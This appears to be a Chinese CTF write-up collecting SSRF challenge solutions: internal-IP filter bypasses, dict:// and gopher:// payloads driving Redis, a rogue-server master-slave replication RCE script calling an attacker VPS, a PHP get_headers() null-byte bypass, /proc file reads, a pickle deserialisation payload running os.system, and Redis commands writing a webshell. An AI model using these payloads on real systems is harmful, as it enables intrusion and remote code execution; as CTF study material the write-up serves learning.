对近日CTF比赛中SSRF考点的一些总结

网鼎杯 2020 玄武组 SSRFMe

part1

给了hint让从本地请求hint.php;check请求的url格式部分的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
function check_inner_ip($url)
{
$match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
die('url fomat error');
}
try
{
$url_parse=parse_url($url);
}
catch(Exception $e)
{
die('url fomat error');
return false;
}
$hostname=$url_parse['host'];
$ip=gethostbyname($hostname);
$int_ip=ip2long($ip);
return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

这里用ip进制转换右移进行比较,绕过方法有:

1.http://0.0.0.0/hint.php

2.http://0x7f000001/hint.php

3.http://@127.0.0.1./hint.php(这种方法在比赛时可用,不过BUU不行)

访问到hint.php后,给出了redis密码:

1
2
3
if(isset($_POST['file'])){
file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}

part2

使用dict初探

由part1,限制请求的url白名单,并且给出了redis密码,那么可以猜到要通过攻击redis来getshell

请求:

?url=dict://0x7f000001:6379/info

返回的数据为:

string(73) "-NOAUTH Authentication required.
-NOAUTH Authentication required.
+OK
"

说明需要认证,因为dict协议使用比较方便,可以直接在/后面跟上redis明文命令执行;可尝试使用dict协议进行认证:

?url=dict://0x7f000001:6379/auth+root

返回的数据:

string(44) "-NOAUTH Authentication required.
+OK
+OK
"

说明认证成功

但是dict只能执行一条redis命令,由于执行每个操作之前都要进行认证,那么就要用到可以一次执行多条命令的gopher协议

使用gopher 探测信息

空格二次编码后为%2520,换行符二次编码后为%250a;需要在每条命令后加上换行符

使用payload:

?url=gopher://0.0.0.0:6379/_AUTH%2520root%250ainfo%250aquit

得到redis版本等信息:

# Server
redis_version:5.0.3

redis主从复制getshell

这里就不细说了,直接使用现成的主从复制脚本:

https://github.com/xmsec/redis-ssrf

编辑ssrf-redis.py,在这个地方编辑使用rogue的ip和端口:

1
2
3
4
5
6
7
8
9
10
11
12
elif mode==3:
lhost="174.1.181.41" # 本机(vps)ip
lport="6666" # rogue-server监听的端口
command=input(">") # 要执行的命令

cmd=generate_rce(lhost,lport,passwd,command)

......
p = quote(p) # gopher后的命令要二次编码
url = "http://730cff09-b621-4d08-b30a-0c4afab78b13.node3.buuoj.cn/?url="+p
res = os.popen("curl {} -v".format(url)).read()
print(res)

这里为了请求更方便稍微改了一下代码

然后修改rogue-server.py,端口要和上面设置的一样,然后将exp.so和rogue-server.py上传至VPS,这俩文件要在同一级目录;然后运行python rogue-server.py

在本地运行ssrf-redis.py,获得命令执行结果

这里有个问题就是第一次redis连接过后,之后再连接就会显示连接成功并断开连接,导致exp.so都没传完就中断了;再VPS用shell脚本死循环执行:

1
2
3
4
5
#!/bin/bash
while [ "1" = "1" ]
do
python rogue-server.py
done

GKCTF2020 cve版签到

页面显示You just view *.ctfhub.com,查看响应头,发现hint:

Hint: Flag in localhost
Tips: Host must be end with '123'

CVE-2020-7066

php的get_headers()函数可以获取一个网站的响应头,例如:

1
2
3
<?php

print_r(get_headers('http://www.gtfly.top'));

得到的结果:

1
2
3
4
5
6
7
8
9
10
11
12
Array
(
[0] => HTTP/1.1 200 OK
[1] => Server: nginx/1.10.3 (Ubuntu)
[2] => Date: Sat, 06 Jun 2020 00:38:14 GMT
[3] => Content-Type: text/html
[4] => Content-Length: 6179
[5] => Last-Modified: Fri, 05 Jun 2020 09:38:27 GMT
[6] => Connection: close
[7] => ETag: "5eda1293-1823"
[8] => Accept-Ranges: bytes
)

CVE描述:

在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断

例如用php7.3.11版本进行测试:

1
2
3
<?php
echo phpversion()."\n";
print_r(get_headers(urldecode('http://www.gtfly.top%00gtfly')));

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
7.3.11
Array
(
[0] => HTTP/1.1 200 OK
[1] => Server: nginx/1.10.3 (Ubuntu)
[2] => Date: Sat, 06 Jun 2020 00:42:17 GMT
[3] => Content-Type: text/html
[4] => Content-Length: 6179
[5] => Last-Modified: Fri, 05 Jun 2020 09:38:27 GMT
[6] => Connection: close
[7] => ETag: "5eda1293-1823"
[8] => Accept-Ranges: bytes
)
[Finished in 0.1s]

构造:

1
?url=http://127.0.0.123%00.ctfhub.com

GKCTF2020 EZ三剑客-EzWeb

有一个输入框,网页源码中提示?secret,访问得到ifconfig的结果,考虑存在内网,扫描发现果然存在,然后扫端口,发现6379,那么猜测redis rce

使用file:///etc/passwd被过滤了,不能读文件;但可以用file:/etc/passwd的方式读取

得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
}

if(isset($_GET['submit'])){
$url = $_GET['url'];
//echo $url."\n";
if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
{
//var_dump($match);
die('别这样');
}
curl($url);
}
if(isset($_GET['secret'])){
system('ifconfig');
}
?>

直接用gopherus生成redis未授权访问写shell的payload即可getshell,只需一次url编码即可,不需要自己另外编码

注意写的shell位于另一台内网机子中,因此需要在输入框中访问写的shell

使用http协议访问6379时:

http://173.9.122.11:6379/

回显为:

-ERR wrong number of arguments for 'get' command 1

PWNHUB公开赛 七抓鱼 在线FLAG爬取系统

地址:

1
http://139.217.102.207:8000/

注册登录,ssrf读文件

/proc/self/cmdline:

1
/usr/local/python3/bin/python3.5/usr/local/python3/bin/gunicorn--config=config.pyrun:app

注意读到的启动服务信息没有空格;这是用gunicorn部署的python web,run.py是flask的启动python文件,app是flask应用程序实例,那么接着读源码

/proc/self/cwd/run.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
import pickle
from sipder import Spider
from redis import StrictRedis
from flask import Flask, render_template, redirect, session, request, make_response, url_for, abort, render_template_string
from user import *


app = Flask(__name__)
redis = StrictRedis(host='127.0.0.1',port=6379,db=0)

@app.route('/')
def index():
cookie = request.cookies.get("Cookie")
return redirect(url_for("login"))

@app.route('/login/',methods=['GET','POST'])
def login():
if request.method != 'GET':
username = request.form.get('username')
password = request.form.get('password')
cookie = Cookie()
cookie.create = username
cookie = cookie.create
try:
# 登录时若redis存在cookie记录,进行反序列化
if redis.exists(cookie):
user = pickle.loads(redis.get(cookie))
if user.verify_pass(password):
resp = make_response(redirect(url_for('home')))
resp.set_cookie('Cookie',cookie)
return resp
except:
abort(500)
return render_template("login.html")

@app.route('/register/',methods=['GET','POST'])
def register():
if request.method != 'GET':
email = request.form.get('email')
username = request.form.get('username')
password = request.form.get('password')
user = User(email,username,password)
cookie = Cookie()
cookie.create = username
cookie = cookie.create
try:
if not redis.exists(cookie):
redis.set(cookie,pickle.dumps(user)) # 注册时将user对象序列化后存到redis中
resp = make_response(redirect(url_for('home')))
resp.set_cookie("Cookie",cookie)
return resp
except:
abort(500)
return render_template("register.html")

# 修改个人信息
@app.route('/home/',methods=['GET','POST'])
def home():
cookie = request.cookies.get('Cookie')
# cookie满足格式,并存在于redis中,存在一次反序列化操作
try:
if Cookie.verify(cookie) and redis.exists(cookie):
user = redis.get(cookie)
user = pickle.loads(user)
if request.method != "GET":
formlist = request.form.to_dict()
User.modify_info(user,formlist)
redis.set(cookie,pickle.dumps(user))
return render_template("home.html",user=user)
return render_template("home.html",user=user)
except:
return abort(500)
return redirect(url_for("login"))


@app.route('/spider/',methods=['GET','POST'])
def spider():
cookie = request.cookies.get('Cookie')
# 同上
try:
if Cookie.verify(cookie) and redis.exists(cookie):
user = redis.get(cookie)
user = pickle.loads(user)
except:
return abort(500)
result=''
if request.method == "GET":
result=''
elif request.method != "GET" and request.form.get('url')!=None:
try:
target_url = request.form.get('url')
new_spider = Spider(target_url)
result = new_spider.spiderFlag()
except Excetion as e:
result = e
return render_template("spider.html",result=str(result),user=user)

@app.route('/testSpider/')
def TSpider():
html = '&lt;div id="flag"&gt;Flag{hahaha This is a test for tested Spider mode}&lt;/div&gt;'
return render_template_string(html)


@app.route('/logout/')
def logout():
resp = make_response(redirect(url_for('login')))
resp.set_cookie('Cookie','')
return resp

@app.errorhandler(500)
def error(e):
return render_template("error.html")

if __name__ == "__main__":
app.run(
debug=True,
port=5000,
host="0.0.0.0"
)

user.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
'''
-------------------------------------------------
File name : run.py
Description : 创建用户模型和Cookie模型
Author : RGDZ
Date : 2019/04/30
-------------------------------------------------
Version : v1.0
Contact : rgdz.gzu@qq.com
License : (C)Copyright 2018-2019
-------------------------------------------------
'''
from hashlib import md5

# here put the import lib
class User(object):
def __init__(self,email,username,password):
self.email = email
self.username = username
self.password = md5(password.encode(encoding='utf8')).hexdigest()
self.phone = None
self.qqnumber = None
self.intro = None

def verify_pass(self,password):
if password and md5(password.encode(encoding='utf8')).hexdigest() == self.password:
return True
return None
# dict可控
@staticmethod
def modify_info(obj,dict):
for key in dict:
if hasattr(obj,key) and dict[key]!='':
setattr(obj,key,dict[key])



class Cookie(object):
__key = "abcd"
def __init__(self):
__key = "abcd"

@property
def create(self):
self.mix_str = (self.username+Cookie.__key).encode(encoding="utf8")
self.md5_str = self.username+md5(self.mix_str).hexdigest()
return self.md5_str

@create.setter
def create(self,username):
self.username = username

@staticmethod
def verify(verify_cookie):
if verify_cookie:
username = verify_cookie[:-32]
verify_str = verify_cookie[-32:]
# cookie的前32位+"abcd"之后的md5要等于后32位
return md5((username+Cookie.__key).encode(encoding="utf8")).hexdigest()==verify_str
return None

sipder.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import urllib
import urllib.request

from bs4 import BeautifulSoup


class Spider:
def __init__(self, url):
self.target_url = url

def __getResponse(self):
try:
info = urllib.request.urlopen(self.target_url).read().decode("utf-8")
return (info, True)
except Exception as err:
return (err, False)

def spiderFlag(self):
infos = self.__getResponse()
if infos[1]:
soup = BeautifulSoup(infos[0])
flag = soup.find(id=='flag')
return infos[0]
return flag.text
return infos[0]

其请求url使用的是urllib这个库,关于这个库的CVE:2016年曾经爆出过python库中urllib的CRLF HTTP头注入漏洞(CVE-2016-5699),2019年又出现了新的Python urllib CRLF 注入漏洞(CVE-2019-9740);那么便可利用CRLF攻击redis内网

StrictRedis未使用password=''这个参数,说明redis没有设置密码,那么便可通过更新redis键值,之后访问触发反序列化来实现RCE

1
2
3
4
5
6
7
8
9
10
import cPickle
import os
import redis
class exp(object):
def __reduce__(self):
s = "ls > /tmp/res"
return (os.system, (s,))
e = exp()
s = cPickle.dumps(e)
print(s)

更新session后刷新访问,便可直接用file://来读取/tmp/res

相关工具小结

1.https://github.com/tarunkant/Gopherus

对于MySQL,它可以构造出写shell的payload;对于redis,可以构造出写crontab的payload、写php webshell的payload

2.https://github.com/xmsec/redis-ssrf

直接进行redis的主从复制攻击

3.https://github.com/firebroo/sec_tools

可以监听网卡将对MySQL、reids等的操作编码;可以直接通过写入redis命令来编码

相关思路小结

1.查看目标站点对SSRF限制、查看PHP、python版本等信息,注意能否通过file://获取源码、能否连接外网

2.注意是否存在get_headers()、CRLF等CVE

3.查看redis、MySQL版本;如果服务器版本不是centos,则不用考虑写crontab定时任务反弹shell;如果redis版本不在4.x-5.x,那么就不能进行主从复制RCE

4.验证是否具有读写文件权限;常用命令:

# 设置要写入的php代码
set x "<?=phpinfo();?>"
# 设置文件名
config set dbfilename xxx 
# 设置存储路径
config set dir xxx 
# 获取设置的路径
config get dir
# 获取设置的文件名
config get dbfilename
# 保存文件
save

5.redis主从复制RCE、pickle反序列化、攻击fastcgi…